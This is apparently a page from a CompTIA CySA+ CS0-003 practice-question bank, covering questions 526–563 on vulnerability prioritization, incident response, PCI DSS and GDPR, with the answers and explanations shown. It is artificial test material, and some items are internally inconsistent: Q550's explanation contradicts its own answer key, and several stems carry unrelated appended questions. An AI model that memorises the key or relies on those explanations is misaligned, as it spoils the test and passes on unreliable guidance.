CompTIA CySA+ CS0-003 (CS0-003) — Questions 526600

989 questions total · 14pages · All types, answers revealed

Page 7

Page 8 of 14

Page 9
526
MCQeasy

A security analyst is reviewing the results of a vulnerability scan. The analyst sees a plugin output that includes the CVSS vector string AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. What is the base score of this vulnerability?

A.6.5
B.9.8
C.10.0
D.7.5
AnswerB

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H yields a base score of 9.8 in CVSS v3.1.

Why this answer

The vector indicates Network attack vector, Low attack complexity, No privileges required, No user interaction, Unchanged scope, and High impact on Confidentiality, Integrity, and Availability. For CVSS v3.1, this corresponds to a base score of 9.8 (Critical).

527
Multi-Selecthard

A root-cause analysis finds that an alert fired but was never triaged. Which corrective actions are useful? (Choose two.)

Select 2 answers
A.Blame an individual without process review
B.Delete the alert rule because it was inconvenient
C.Define queue ownership and escalation thresholds
D.Add monitoring for stale or unassigned alerts
AnswersC, D

Ownership prevents alerts being orphaned.

Why this answer

Option C is correct because defining queue ownership and escalation thresholds ensures that alerts are assigned to a specific team or individual and have a clear path for escalation if not acknowledged within a defined time. This directly addresses the root cause of the alert never being triaged by enforcing accountability and automated follow-up, which is a standard incident response practice per NIST SP 800-61.

Exam trap

The CS0-003 exam often tests the misconception that punitive measures (blaming individuals) or removing inconvenient alerts are valid corrective actions, when the correct approach is always to improve process and automation to prevent recurrence.

528
MCQmedium

A company wants to prioritize vulnerabilities based on exploitability and impact. Which industry standard framework should the analyst use?

A.CVSS v3
B.OWASP Top 10
C.CVE
D.NIST SP 800-53
AnswerA

CVSS provides a numeric severity score based on exploitability and impact.

Why this answer

CVSS v3 (Common Vulnerability Scoring System) is the industry-standard framework for prioritizing vulnerabilities based on exploitability and impact. It provides a numerical score (0-10) derived from metrics such as Attack Vector, Attack Complexity, Privileges Required, User Interaction, and Scope, along with Confidentiality, Integrity, and Availability impact. This allows analysts to objectively rank vulnerabilities for remediation.

Exam trap

CompTIA often tests the distinction between a vulnerability scoring system (CVSS) and a vulnerability identification system (CVE), causing candidates to confuse CVE as a prioritization tool.

How to eliminate wrong answers

Option B (OWASP Top 10) is wrong because it is a list of the most critical web application security risks, not a scoring system for individual vulnerabilities; it does not assign exploitability or impact scores. Option C (CVE) is wrong because it is a dictionary of publicly disclosed vulnerabilities with unique identifiers, not a prioritization or scoring framework. Option D (NIST SP 800-53) is wrong because it is a catalog of security controls for federal information systems, not a vulnerability scoring methodology.

529
Multi-Selectmedium

An organization is implementing a new security incident response plan and wants to establish clear communication protocols. Which three of the following are essential components of effective incident communication? (Choose three.)

Select 3 answers
.Defining a single point of contact (POC) for each stakeholder group
.Using only email for all incident updates to maintain a written record
.Establishing pre-approved templates for different incident types
.Including all employees in every incident notification to ensure transparency
.Creating an escalation matrix with authority levels for decision-making
.Automatically releasing incident details to the press within one hour

Why this answer

Defining a single point of contact (POC) for each stakeholder group ensures clear, controlled communication and prevents conflicting information. Pre-approved templates for different incident types enable rapid, consistent, and accurate notifications without needing to craft messages from scratch during a crisis. An escalation matrix with authority levels ensures that decisions are made by the appropriate personnel based on incident severity, preventing delays and unauthorized actions.

Exam trap

CompTIA often tests the distinction between 'transparency' and 'controlled communication' — candidates may incorrectly choose 'include all employees' thinking it promotes transparency, but the exam expects role-based, need-to-know notifications to avoid operational chaos.

530
MCQeasy

Two servers have the same critical vulnerability. One hosts a public payment API; the other is a lab server isolated from production. What changes the remediation priority? For business prioritization, Which recommendation gives the best risk-based order of work?

A.The number of installed fonts
B.The colour of the scanner dashboard
C.Whether the hostname is shorter
D.Asset criticality, exposure, and business impact
AnswerD

The same CVE can represent different risk depending on where it exists and what the asset supports.

Why this answer

Option D is correct because remediation priority in vulnerability management is determined by asset criticality, exposure, and business impact, not by superficial attributes. The public payment API server has high business impact and exposure to external threats, making it a higher priority than the isolated lab server, even though both share the same vulnerability. This aligns with risk-based prioritization frameworks such as CVSS environmental metrics and FAIR analysis.

Exam trap

The CS0-003 exam often tests the misconception that all vulnerabilities with the same CVSS base score should be remediated with equal urgency, ignoring the critical role of asset context and business impact in risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because the number of installed fonts has no bearing on vulnerability severity, exploitability, or business risk; it is an irrelevant system configuration detail. Option B is wrong because the colour of the scanner dashboard is a cosmetic UI element that does not affect technical risk assessment or prioritization decisions. Option C is wrong because hostname length is arbitrary and does not correlate with asset criticality, exposure, or the likelihood of exploitation; a shorter hostname does not indicate higher risk.

531
MCQmedium

In a regulated payment environment, a developer accidentally committed a cloud access key to a public repository. Logs show the key was used from an unfamiliar IP. What should be done first? During eradication, which decision is most defensible? which action best reduces risk without losing evidence?

A.Wait to see whether charges increase
B.Disable or rotate the key and review actions performed with it
C.Block the developer's laptop from Wi-Fi
D.Ask the developer to delete the commit only
AnswerB

The exposed credential must be invalidated and its use scoped through audit logs. In eradication, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option B is correct because the immediate priority is to revoke the compromised cloud access key to prevent further unauthorized use, while simultaneously reviewing logs to understand the scope of the attacker's actions. In a regulated payment environment (e.g., PCI DSS), failing to disable the key promptly could lead to a data breach and non-compliance penalties. Reviewing actions with the key is essential for incident response and forensic evidence collection.

Exam trap

The CS0-003 exam often tests the misconception that containment means physically isolating the user (e.g., blocking Wi-Fi) rather than logically revoking the compromised credential, leading candidates to pick Option C over the correct technical containment action.

How to eliminate wrong answers

Option A is wrong because waiting to see whether charges increase is a passive, reactive approach that allows the attacker continued access, potentially exfiltrating sensitive payment data or escalating privileges — this violates the 'containment' phase of incident response. Option C is wrong because blocking the developer's laptop from Wi-Fi does not revoke the cloud access key; the key remains valid and can still be used from the unfamiliar IP, and it may hinder legitimate incident response activities by isolating the developer without addressing the root cause.

532
Multi-Selectmedium

A security analyst is investigating a phishing incident that resulted in credential theft. Which TWO actions should the analyst take as part of short-term containment? (Choose two.)

Select 2 answers
A.Block the phishing domain at the email gateway
B.Rebuild the affected workstations from a clean image
C.Conduct a full vulnerability scan of the network
D.Change all user passwords in the domain
E.Disable the compromised user accounts
AnswersA, E

Correct. This prevents more users from clicking.

Why this answer

Short-term containment aims to stop the immediate threat. Disabling accounts and blocking malicious domains are quick containment actions.

533
Multi-Selecthard

A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)

Select 3 answers
A.Scheduled tasks in the Task Scheduler
B.Windows Event Logs for login events
C.Network connections from the endpoint
D.Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
E.Services listed in the Service Control Manager
AnswersA, D, E

Correct. Scheduled tasks are a common persistence mechanism.

Why this answer

Registry Run keys (T1547.001), scheduled tasks (T1053.005), and services (T1543.003) are common persistence mechanisms. Startup folders are also common but are not listed as a separate option here; the three listed are correct.

534
MCQeasy

During a phishing investigation, an employee reports clicking a link and entering credentials. Which of the following should be the first step?

A.Conduct user awareness training
B.Block the phishing domain
C.Analyze the email headers
D.Reset the employee's password
AnswerD

Immediate password reset mitigates account compromise.

Why this answer

The immediate priority after credential compromise is to secure the account and prevent unauthorized access. Resetting the employee's password (Option D) invalidates the stolen credentials, stopping the attacker from using them to log in. This aligns with the NIST Incident Response Framework's containment phase, which must occur before any remediation or analysis steps.

Exam trap

The CS0-003 exam often tests the distinction between containment and remediation; the trap here is that candidates choose 'Analyze the email headers' (Option C) because they confuse forensic analysis with the first step of incident response, but the priority must always be to stop active harm before investigating.

How to eliminate wrong answers

Option A is wrong because user awareness training is a long-term preventive measure, not an immediate containment step; conducting it first would leave the compromised account vulnerable. Option B is wrong because blocking the phishing domain, while useful, does not address the immediate risk of the attacker using the stolen credentials to access the account. Option C is wrong because analyzing email headers is part of the forensic investigation phase, which should follow containment to avoid delaying critical account protection.

535
MCQmedium

A security team is implementing CIS Benchmarks for a Linux server. They need to choose between Level 1 and Level 2 benchmarks. Which of the following best describes Level 1 benchmarks?

A.They are basic security settings that can be implemented with minimal disruption
B.They are mandatory for compliance with DoD STIGs
C.They are the most restrictive settings, suitable for high-security environments
D.They include advanced settings that require extensive testing
AnswerA

Level 1 is designed to be a practical, easy-to-implement baseline.

Why this answer

CIS Level 1 benchmarks are intended to provide a baseline security configuration without causing significant operational impact.

536
MCQhard

A post-incident report finds that no one owned a failed alert integration. What should the corrective action include? If the primary audience is executive leadership, which content choice is most appropriate?

A.A vague recommendation to improve security
B.Deletion of the integration record
C.Named owner, due date, acceptance criteria, and retest plan
D.No action because the incident is closed
AnswerC

Corrective actions should be accountable and verifiable. The report should be tuned to executive leadership while preserving factual accuracy.

Why this answer

Option C is correct because a failed alert integration indicates a gap in accountability and process validation. The corrective action must assign a named owner, set a due date, define acceptance criteria, and include a retest plan to ensure the integration is properly configured and monitored. This aligns with ITIL's change management and incident management practices, where ownership and verification are critical to closing the loop on failed controls.

Exam trap

The CS0-003 exam often tests the misconception that a vague recommendation or deleting a record is sufficient for corrective action, when in fact the exam emphasizes the need for specific, accountable, and verifiable remediation steps in post-incident reporting.

How to eliminate wrong answers

Option A is wrong because a vague recommendation to improve security lacks specificity and does not address the root cause of the failed integration; it provides no actionable steps for remediation or verification. Option B is wrong because deleting the integration record removes evidence of the failure and does not fix the underlying configuration or ownership issue; it also violates audit trail requirements and could mask recurring problems.

537
MCQhard

During a web application penetration test using Burp Suite, a security analyst identifies that an API endpoint accepts a URL parameter that is used to fetch data from an external resource. The application does not validate or sanitize the parameter. This is most likely vulnerable to which attack?

A.SQL injection
B.Server-Side Request Forgery (SSRF)
C.Cross-site scripting (XSS)
D.XML External Entity (XXE)
AnswerB

SSRF exploits the server to make unauthorized requests to internal or external resources.

Why this answer

Server-Side Request Forgery (SSRF) occurs when an attacker can induce the server to make requests to arbitrary URLs, often by manipulating a URL parameter.

538
MCQmedium

A business unit accepts the risk of delaying a patch because downtime would breach a contractual deadline. What should be updated? For control selection, Which control best addresses the stated weakness without hiding risk?

A.The phishing training completion list
B.The risk register with owner, justification, expiry date, and compensating controls
C.The firewall vendor invoice
D.The incident containment playbook only
AnswerB

Risk acceptance must be explicit, time-bound, owned, and controlled.

Why this answer

Option B is correct because when a business unit accepts the risk of delaying a patch, the risk register must be updated to formally document the risk acceptance. This update should include the risk owner, the business justification for the delay, an expiry date for the exception, and any compensating controls (e.g., network segmentation, enhanced monitoring) that reduce the risk during the gap. This ensures the risk is tracked, reviewed, and eventually remediated, aligning with vulnerability management best practices.

Exam trap

The CS0-003 exam often tests the distinction between operational activities (e.g., training, billing) and formal risk management documentation; the trap here is that candidates may confuse updating a training list or invoice with the required risk register update, failing to recognize that risk acceptance must be formally recorded with ownership and compensating controls.

How to eliminate wrong answers

Option A is wrong because phishing training completion lists address user awareness and social engineering risks, not the technical risk of delaying a critical patch; updating this list does not document or manage the accepted risk. Option C is wrong because the firewall vendor invoice is a financial document unrelated to risk acceptance or vulnerability management; it does not capture the risk owner, justification, expiry date, or compensating controls needed for formal risk tracking.

539
MCQhard

A cybersecurity analyst is preparing a threat intelligence report for the SOC team. Which type of intelligence should be included to provide actionable indicators of compromise (IoCs)?

A.Tactical intelligence
B.Strategic intelligence
C.Technical intelligence
D.Operational intelligence
AnswerA

Tactical intelligence provides IoCs for immediate action.

Why this answer

Tactical intelligence includes IoCs such as IP addresses, domain names, and hashes that can be used for detection and blocking.

540
MCQeasy

Which technology is specifically designed to detect anomalous user behavior that may indicate a compromised account?

A.IDS.
B.UEBA.
C.SIEM.
D.Antivirus.
AnswerB

UEBA uses machine learning to detect anomalous user and entity behavior.

Why this answer

User and Entity Behavior Analytics (UEBA) is specifically designed to establish baselines of normal user behavior and detect anomalous activities—such as unusual login times, impossible travel, or abnormal data access patterns—that may indicate a compromised account. Unlike signature-based tools, UEBA leverages machine learning and statistical modeling to identify deviations from established norms, making it the correct choice for detecting account compromise.

Exam trap

CompTIA often tests the distinction between correlation-based tools (SIEM) and behavior-based tools (UEBA), and the trap here is that candidates confuse SIEM's log aggregation and rule-based alerting with UEBA's machine learning-driven anomaly detection for user behavior.

How to eliminate wrong answers

Option A is wrong because an Intrusion Detection System (IDS) primarily monitors network traffic for known attack signatures or protocol anomalies, not user behavior patterns. Option C is wrong because a Security Information and Event Management (SIEM) system aggregates and correlates logs from multiple sources but relies on predefined rules and signatures rather than behavioral baselining to detect anomalies. Option D is wrong because Antivirus software detects and blocks known malware based on signatures and heuristics, not user behavior or account compromise indicators.

541
MCQmedium

An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?

A.tcpdump
B.nmap
C.Wireshark
D.NetFlow analyzer
AnswerD

NetFlow provides aggregated flow records, enabling quick searches for traffic on a specific port.

Why this answer

NetFlow collects metadata about network flows, including destination IP and port, enabling analysts to query for all traffic on a specific port across the network.

542
Multi-Selectmedium

A vulnerability report is going to system owners. Which elements make it actionable? (Choose three.)

Select 3 answers
A.Only a generic statement that risk exists
B.Affected assets and owners
C.Due dates based on severity or SLA
D.Remediation guidance and validation steps
AnswersB, C, D

Owners need to know what they must fix.

Why this answer

Option B is correct because identifying affected assets and their owners is essential for accountability and remediation. Without this information, system owners cannot determine which systems require patching or configuration changes, making the report non-actionable. This aligns with the NIST SP 800-40 Rev. 4 guidance on vulnerability management, which emphasizes asset ownership as a prerequisite for response.

Exam trap

The CS0-003 exam often tests the misconception that a vulnerability report is actionable if it merely states risk exists, but without asset ownership and due dates, the report lacks the specificity required for system owners to take concrete steps.

543
MCQmedium

A user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the incident responder must first revoke the malicious OAuth app grant to immediately stop the attacker's access via the delegated mailbox permissions. Following revocation, reviewing mailbox access logs (e.g., Mailbox Audit Log, EWS/Graph API calls) is essential to assess the scope of compromise, and identifying other users who consented to the same app is critical to contain lateral movement. This aligns with the NIST SP 800-61 incident response lifecycle's containment and eradication phase.

Exam trap

CompTIA often tests the misconception that password resets or MFA can mitigate OAuth consent attacks, when in reality the OAuth grant is independent of the user's authentication credentials and must be explicitly revoked.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; once the user grants permissions, the app can access the mailbox without any further authentication, bypassing MFA entirely. Option B is wrong because deleting all emails destroys forensic evidence and does not remove the attacker's persistent access via the OAuth grant, which must be revoked first. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token or the delegated permissions; the app retains mailbox access until the grant is explicitly revoked.

544
MCQmedium

After a high-priority SOC escalation, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible? which response best matches incident-response practice?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth consent grant, which removes the app's access to the mailbox via the Microsoft Graph API. Reviewing mailbox access (e.g., via Exchange Online audit logs) is necessary to assess data exfiltration, and identifying other users who consented helps contain a potential phishing campaign targeting the same app. This follows the NIST SP 800-61 incident response process for containment, eradication, and recovery.

Exam trap

CompTIA often tests the misconception that resetting a password or enabling MFA is sufficient to revoke OAuth app access, when in fact OAuth tokens are independent of user credentials and require explicit grant revocation.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; once the user grants delegated permissions, the app can access the mailbox using its own tokens without requiring MFA. Option B is wrong because deleting all emails destroys forensic evidence and does not remove the app's persistent access; the OAuth grant must be revoked first. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token or the app's granted permissions; the app can continue to access the mailbox via the Microsoft identity platform.

545
Multi-Selecthard

A host is suspected of running fileless malware. Which artefacts should be collected quickly? (Choose two.)

Select 2 answers
A.Memory image or live response data
B.Active network connections and running processes
C.A list of cafeteria purchases
D.A printed office map
AnswersA, B

Fileless activity may exist mainly in memory.

Why this answer

Fileless malware operates in memory without writing to disk, so capturing a memory image or live response data preserves the malicious code, injected DLLs, and process hollowing artifacts that would vanish on reboot. Active network connections and running processes reveal the malware's C2 communications and its in-memory execution context, which are critical for identifying the infection vector and scope.

Exam trap

The CS0-003 exam often tests the misconception that fileless malware leaves no artifacts at all, leading candidates to overlook memory and live response data, or to choose irrelevant options like cafeteria purchases that seem like a distractor but have no forensic value.

546
MCQeasy

Which of the following vulnerability lifecycle phases involves verifying that a remediation has been successfully applied and that the vulnerability no longer exists?

A.Discovery
B.Prioritization
C.Remediation
D.Verification
AnswerD

Correct; verification confirms the fix was effective.

Why this answer

Verification is the phase where after remediation, the system is rescanned or checked to confirm the vulnerability is mitigated.

547
MCQmedium

A security operations center (SOC) analyst is investigating an alert from the endpoint detection and response (EDR) system indicating that a process named "svchost.exe" spawned from a parent process "cmd.exe" on a user workstation. The user is a software developer who frequently uses command-line tools. The analyst checks the command line arguments: "cmd.exe /c powershell -EncodedCommand ...". The encoded command decodes to a script that downloads a payload from a remote server and executes it. The analyst also sees that the workstation has established an outbound connection to the same server on port 443. Which of the following is the BEST immediate action?

A.Isolate the workstation from the network.
B.Disable the user account.
C.Kill the svchost.exe process.
D.Block the remote server IP at the firewall.
AnswerA

Immediately contains the threat by preventing further communication and lateral movement.

Why this answer

Isolating the workstation is the best immediate action because the EDR alert confirms active compromise: a malicious encoded PowerShell command executed via cmd.exe spawned svchost.exe (a process commonly abused for masquerading), and an outbound connection to the same C2 server on port 443 (HTTPS) indicates ongoing data exfiltration or further payload delivery. Network isolation stops all communication with the attacker while preserving forensic evidence on the endpoint, which is critical for containment in a SOC response.

Exam trap

CompTIA often tests the misconception that blocking the remote IP or killing the process is sufficient, but the trap here is that the active outbound connection and running payload require immediate network containment to prevent data exfiltration and lateral movement, not just reactive blocking or process termination.

How to eliminate wrong answers

Option B is wrong because disabling the user account does not stop the already-running malicious process or its outbound C2 connection; the threat persists on the endpoint regardless of authentication status. Option C is wrong because killing svchost.exe may disrupt the malware but does not block the outbound connection already established, and the process could be a legitimate svchost.exe instance that has been injected or hollowed, making termination risky without analysis. Option D is wrong because blocking the remote server IP at the firewall only prevents future connections from that IP but does not stop the current active session or the malware already executing on the workstation, and the attacker can easily switch to a different IP or domain.

548
MCQmedium

During a vulnerability scan, an analyst discovers a high-severity vulnerability on a critical database server. The server is in production and cannot be taken offline. The vendor has released a patch but requires a reboot. Which of the following should the analyst recommend FIRST?

A.Implement a workaround from the vendor.
B.Schedule the patch during the next maintenance window.
C.Apply the patch immediately.
D.Migrate the database to a new server.
AnswerB

This balances security with availability.

Why this answer

Option B is correct because the database server is in production and cannot be taken offline, so the patch must be applied during a scheduled maintenance window to minimize business disruption. The vulnerability is high-severity, but the vendor requires a reboot, which would cause downtime; therefore, the first step is to plan the patch application at the next available maintenance window, not to apply it immediately or implement a workaround that may not fully mitigate the risk.

Exam trap

CompTIA often tests the candidate's ability to prioritize business continuity over immediate remediation, leading candidates to incorrectly choose 'Apply the patch immediately' (Option C) because they focus solely on the high severity without considering the operational impact of a reboot on a critical production server.

How to eliminate wrong answers

Option A is wrong because implementing a workaround from the vendor is a temporary measure that may not fully address the vulnerability and could introduce additional complexity or performance issues; the analyst should prioritize the patch itself. Option C is wrong because applying the patch immediately would cause an unplanned reboot of a critical production database server, leading to unacceptable downtime and potential data loss or corruption. Option D is wrong because migrating the database to a new server is a drastic, time-consuming, and high-risk operation that is not the first recommendation; it should only be considered if patching is impossible or the server is end-of-life.

549
MCQhard

A vulnerability report is being prepared for an organization's management. Which of the following is the MOST appropriate structure for this report?

A.Charts showing open vulnerability counts over time, without any narrative
B.List of all vulnerabilities sorted by CVSS score, followed by detailed technical descriptions
C.Executive summary, findings by severity, risk acceptance, remediation timeline
D.Network diagram with vulnerability locations, patch status, and compliance checklists
AnswerC

Correct. This structure provides both high-level and detailed information needed for decision-making.

Why this answer

A standard vulnerability report includes an executive summary for high-level decision-makers, findings grouped by severity, risk acceptance decisions, and a remediation timeline.

550
Multi-Selectmedium

Which TWO of the following are best practices for vulnerability scanning in a PCI DSS compliant environment? (Select TWO)

Select 2 answers
A.Perform quarterly scans
B.Scan only external IP ranges
C.Use a single scanning vendor
D.Scan after any significant network change
E.Use authenticated scanning for more accurate results
AnswersA, E

PCI DSS requirement 11.2 mandates quarterly external and internal scans.

Why this answer

Options A and C are correct. PCI DSS requires quarterly internal and external vulnerability scans. Option B is incorrect because both credentialed and non-credentialed scans are recommended.

Option D is incorrect because post-change scanning is a general best practice but not specifically a PCI DSS requirement for this context. Option E is incorrect because multiple scanning vendors can be used.

551
MCQmedium

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the containment trade-off phase, Which response balances containment with evidence preservation?

A.Review application logs for query errors, authentication events, and abnormal database access
B.Disable the WAF rule because it may be noisy
C.Treat every HTTP 200 as proof of exploitation
D.Ask users to change passwords without checking logs
AnswerA

HTTP 200 can occur for blocked, handled, or successful requests; application and database context determine impact.

Why this answer

Option A is correct because HTTP 200 responses from a WAF-protected endpoint do not rule out successful SQL injection; the application may have processed the malicious input without triggering an HTTP error. Reviewing application logs for query errors, authentication anomalies, and abnormal database access provides direct evidence of whether the injection actually succeeded, which is essential before declaring compromise. This approach balances containment by not disrupting legitimate traffic while preserving forensic evidence for analysis.

Exam trap

The CS0-003 exam often tests the misconception that an HTTP 200 status code definitively indicates no exploitation occurred, when in reality it only reflects the web server's response, not the success or failure of the injected SQL.

How to eliminate wrong answers

Option B is wrong because disabling the WAF rule without investigation removes a critical detection layer, potentially allowing ongoing exploitation and destroying evidence of the attack. Option C is wrong because an HTTP 200 status code only indicates the web server responded normally; it does not confirm that the SQL injection payload executed successfully, as many injections fail silently or are caught by parameterized queries.

552
Multi-Selecthard

An organization is preparing for a compliance audit. Which TWO of the following are essential pieces of evidence to demonstrate effective vulnerability management?

Select 2 answers
A.Network topology diagrams
B.Employee training logs
C.Vulnerability scan reports
D.Patch management reports
E.Incident response playbooks
AnswersC, D

Provide evidence of scanning and identification of vulnerabilities.

Why this answer

Vulnerability scan reports show identified vulnerabilities, and patch management reports show remediation efforts, together demonstrating the vulnerability management lifecycle.

553
MCQhard

An organization has experienced a data breach involving personal data of EU residents. Under GDPR, what is the maximum time frame within which the organization must notify the supervisory authority?

A.24 hours
B.7 days
C.48 hours
D.72 hours
AnswerD

Correct. GDPR mandates notification within 72 hours.

Why this answer

GDPR Article 33 requires that data breaches be reported to the relevant supervisory authority within 72 hours of becoming aware of the breach, unless the breach is unlikely to result in a risk to individuals' rights and freedoms.

554
MCQmedium

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?

A.True positive
B.True negative
C.False positive
D.False negative
AnswerC

The alert is triggered by legitimate SCP transfers.

Why this answer

The alert is triggered by legitimate administrative activity (SCP file transfer), so it is a false positive. The analyst should tune the SIEM to reduce similar alerts.

555
MCQeasy

Two servers have the same critical vulnerability. One hosts a public payment API; the other is a lab server isolated from production. What changes the remediation priority? For tool configuration, Which scanner or pipeline change most directly improves result quality?

A.The number of installed fonts
B.The colour of the scanner dashboard
C.Asset criticality, exposure, and business impact
D.Whether the hostname is shorter
AnswerC

The same CVE can represent different risk depending on where it exists and what the asset supports.

Why this answer

Remediation priority is determined by risk, which combines asset criticality, exposure, and business impact. The public payment API has high exposure (internet-facing) and high business impact (PCI DSS compliance, financial data), while the lab server is isolated and non-production. A vulnerability scanner like Nessus or Qualys uses asset tags and CVSS environmental metrics (e.g., modified impact sub-scores) to calculate a risk-based priority score, not the number of installed fonts or dashboard color.

Exam trap

The CS0-003 exam often tests the misconception that vulnerability severity alone (e.g., a high CVSS score) determines remediation priority, ignoring that asset context—exposure, criticality, and business impact—is the actual driver of risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because the number of installed fonts is a cosmetic system attribute with no bearing on vulnerability severity, exposure, or business impact; it does not affect CVSS scoring or remediation prioritization. Option B is wrong because the color of the scanner dashboard is a purely aesthetic UI setting that has zero influence on scan results, risk calculation, or the quality of vulnerability detection.

556
MCQhard

A security analyst needs to present the risk of an unpatched critical vulnerability to the board of directors. Which of the following is the most effective way to communicate the risk?

A.Explain the potential financial loss and reputational damage.
B.Show the CVSS score and exploit complexity.
C.Recommend immediate patching without details.
D.Describe the vulnerability in technical terms.
AnswerA

This translates technical risk to business risk.

Why this answer

Boards care about business impact, not technical details. Quantifying financial exposure helps them understand urgency.

557
MCQeasy

During the preparation phase of the NIST SP 800-61 incident response lifecycle, which of the following is the MOST important activity to ensure effective incident response?

A.Using YARA rules to detect malware in the environment
B.Implementing network segmentation to limit lateral movement
C.Conducting a root cause analysis after each incident
D.Creating and training the incident response team
AnswerD

This is a core preparation activity that ensures the team is ready to respond.

Why this answer

Preparation includes creating and training the incident response team, acquiring tools, and establishing procedures. A well-trained team is critical to executing the response effectively.

558
MCQmedium

Which compliance reporting requirement under GDPR mandates that organizations notify the relevant supervisory authority within a specific timeframe after becoming aware of a personal data breach?

A.72 hours
B.7 days
C.24 hours
D.48 hours
AnswerA

GDPR Article 33 requires notification within 72 hours.

Why this answer

GDPR Article 33 requires notification to the supervisory authority within 72 hours of awareness.

559
MCQeasy

Which of the following metrics measures the average time it takes to identify a security incident after it occurs?

A.Patch SLA compliance percentage
B.Mean time to remediate (MTTRem)
C.Mean time to respond (MTTR)
D.Mean time to detect (MTTD)
AnswerD

Correct definition.

Why this answer

MTTD is specifically defined as the average time to detect an incident.

560
MCQhard

A hospital's IT department has been receiving reports from nursing staff that the electronic medical record (EMR) system is responding slowly during peak hours. The network team has verified that the local area network is operating normally and there is no bandwidth congestion. The security analyst reviews the firewall logs and observes repeated outbound connections from the EMR server to an external IP address 198.51.100.23 on TCP port 443 at regular 5-minute intervals. Each connection transfers a small amount of data. The analyst also notes that the EMR server's antivirus software is up to date and no malware has been detected. The hospital's security policy requires that all outbound connections from critical servers be explicitly approved. Further investigation reveals that 198.51.100.23 is associated with a hosting provider in a foreign country. The analyst suspects a data exfiltration. Which of the following actions should the analyst take FIRST?

A.Install a network-based intrusion detection system to monitor the server.
B.Capture and analyze the network traffic between the EMR server and the external IP.
C.Isolate the EMR server from the network and run a full forensic analysis.
D.Block all outbound traffic from the EMR server to the internet immediately.
AnswerB

Capturing and analyzing the traffic provides insight into whether data exfiltration is occurring and what data is being sent, allowing for an informed response.

Why this answer

Option B is correct because the analyst must first confirm whether the outbound connections are actually exfiltrating data or are legitimate (e.g., software updates, license checks). Capturing and analyzing the network traffic (e.g., using tcpdump or Wireshark) allows the analyst to inspect the payload and determine the nature of the data being sent, which is a standard step in incident response before taking more disruptive actions.

Exam trap

CompTIA often tests the principle of 'least disruption first' in incident response, where candidates mistakenly choose an aggressive containment action (like isolation or blocking) before gathering sufficient evidence to confirm the threat.

How to eliminate wrong answers

Option A is wrong because installing a network-based intrusion detection system (NIDS) is a long-term monitoring solution, not an immediate first step to investigate a suspected active exfiltration; it would not provide the specific payload analysis needed now. Option C is wrong because isolating the EMR server and running a full forensic analysis is too disruptive and premature without first confirming that the traffic is malicious; it could halt critical hospital operations unnecessarily. Option D is wrong because immediately blocking all outbound traffic from the EMR server could disrupt legitimate services (e.g., updates, cloud backups) and would destroy evidence of the ongoing communication before it can be analyzed.

561
MCQmedium

A security analyst is configuring a SIEM correlation rule to detect multiple failed login attempts followed by a successful login from the same source IP within a short time window. This pattern suggests a successful brute-force attack. Which of the following correlation types should the analyst use?

A.Thresholding
B.Sequential correlation
C.Aggregation
D.Time-based correlation
AnswerB

Sequential correlation detects events in a specific order, ideal for detecting a pattern of failures followed by success.

Why this answer

Sequential correlation is the correct choice because it detects a specific ordered sequence of events: multiple failed logins followed by a successful login from the same source IP within a defined time window. This pattern is characteristic of a brute-force attack, where an attacker attempts many passwords before succeeding. SIEM tools like Splunk or QRadar use sequential correlation to match event chains where the order matters, not just the count or aggregation of events.

Exam trap

The CS0-003 exam often tests the distinction between sequential correlation and aggregation, where candidates mistakenly choose aggregation because they focus on the 'multiple failed logins' count rather than the required ordered sequence of failures followed by a success.

How to eliminate wrong answers

Option A is wrong because thresholding triggers on a count of events exceeding a threshold (e.g., 10 failed logins) but does not require a subsequent successful login, missing the key pattern of a successful brute-force. Option C is wrong because aggregation groups events by a common attribute (e.g., source IP) but does not enforce an ordered sequence; it would flag any set of failed logins followed by a success even if the success occurred before the failures. Option D is wrong because time-based correlation simply matches events within a time window without requiring a specific order or sequence, so it could match a successful login followed by failed attempts, which is not the brute-force pattern.

562
MCQhard

During a forensic investigation, an analyst needs to acquire volatile memory from a compromised Linux server running a critical application. The server cannot be powered off. Which tool should the analyst use to capture memory with the least impact on the system?

A.LiME
B.avml
C.WinPmem
D.dd
AnswerA

LiME is designed for Linux memory acquisition and minimizes interference with the running system.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that captures memory with minimal footprint, suitable for live acquisition on Linux systems.

563
MCQhard

